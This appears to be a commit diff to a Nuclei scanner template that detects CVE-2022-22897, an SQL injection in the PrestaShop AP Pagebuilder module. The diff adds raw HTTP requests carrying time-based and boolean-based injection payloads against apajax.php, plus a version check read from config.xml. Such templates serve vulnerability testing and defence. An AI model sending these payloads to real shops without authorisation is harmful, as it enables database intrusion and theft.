commit
88039f98cd
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2022-22897
|
||||
|
||||
info:
|
||||
name: PrestaShop Ap Pagebuilder <= 2.4.4 SQL Injection
|
||||
name: PrestaShop AP Pagebuilder <= 2.4.4 - SQL Injection
|
||||
author: mastercho
|
||||
severity: critical
|
||||
description: |
|
||||
|
@ -14,8 +14,6 @@ info:
|
|||
- https://nvd.nist.gov/vuln/detail/CVE-2022-22897
|
||||
- https://packetstormsecurity.com/files/cve/CVE-2022-22897
|
||||
- https://security.friendsofpresta.org/modules/2023/01/05/appagebuilder.html
|
||||
- https://github.com/ARPSyndicate/cvemon
|
||||
- https://github.com/karimhabush/cyberowl
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -35,6 +33,9 @@ info:
|
|||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /modules/appagebuilder/config.xml HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
- |
|
||||
POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
@ -44,21 +45,45 @@ http:
|
|||
|
||||
leoajax=1&product_one_img=if(now()=sysdate()%2Csleep(6)%2C0)
|
||||
- |
|
||||
GET /modules/appagebuilder/config.xml HTTP/1.1
|
||||
POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Referer: {{RootURL}}
|
||||
X-Requested-With: XMLHttpRequest
|
||||
|
||||
leoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6644=6644-- yMwI
|
||||
- |
|
||||
POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Referer: {{RootURL}}
|
||||
X-Requested-With: XMLHttpRequest
|
||||
|
||||
leoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6643=6644-- yMwI
|
||||
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: dsl
|
||||
name: time-based
|
||||
dsl:
|
||||
- 'duration_2>=6'
|
||||
- 'status_code_1 == 200 && compare_versions(version, "<= 2.4.4")'
|
||||
condition: and
|
||||
|
||||
- type: dsl
|
||||
name: blind-based
|
||||
dsl:
|
||||
- 'status_code_1 == 200 && compare_versions(version, "<= 2.4.4")'
|
||||
- 'contains(body_3, "content") && contains(body_3, "{{Hostname}}")'
|
||||
- '!contains(body_4, "content") && !contains(body_4, "{{Hostname}}")'
|
||||
- 'len(body_3) > 200 && len(body_4) <= 22'
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: version
|
||||
part: body_2
|
||||
part: body_1
|
||||
internal: true
|
||||
group: 1
|
||||
regex:
|
||||
- "<version>\\s*<!\\[CDATA\\[(.*?)\\]\\]>\\s*<\\/version>"
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration_1>=6'
|
||||
- 'status_code_2 == 200 && compare_versions(version, "<= 2.4.4")'
|
||||
condition: and
|
||||
# digest: 4a0a00473045022029319142054ee6f0ddb0bc16189b4c16e59004c93276cc82b97b27cc4d5a5efb022100bc6b21b2081ff6e7b7e7e71fab33e9484dfe3b6239cc8b11961d4ad845db15c1:922c64590222798bb761d5b6d8e72950
|
|
@ -39,8 +39,8 @@ http:
|
|||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- duration>=6
|
||||
- contains(content_type, "text/html")
|
||||
- contains(header, 'PrestaShop')
|
||||
- 'duration>=6'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(header, "PrestaShop")'
|
||||
condition: and
|
||||
# digest: 4b0a00483046022100b87838fd7d263c207e34f1457465b2f00642af421684161d37081d4b8ad0413b022100f379548beef0caf23301dc7d71e0a9d46c803654f1815f49a1c4d8838bc7761e:922c64590222798bb761d5b6d8e72950
|
Loading…
Reference in New Issue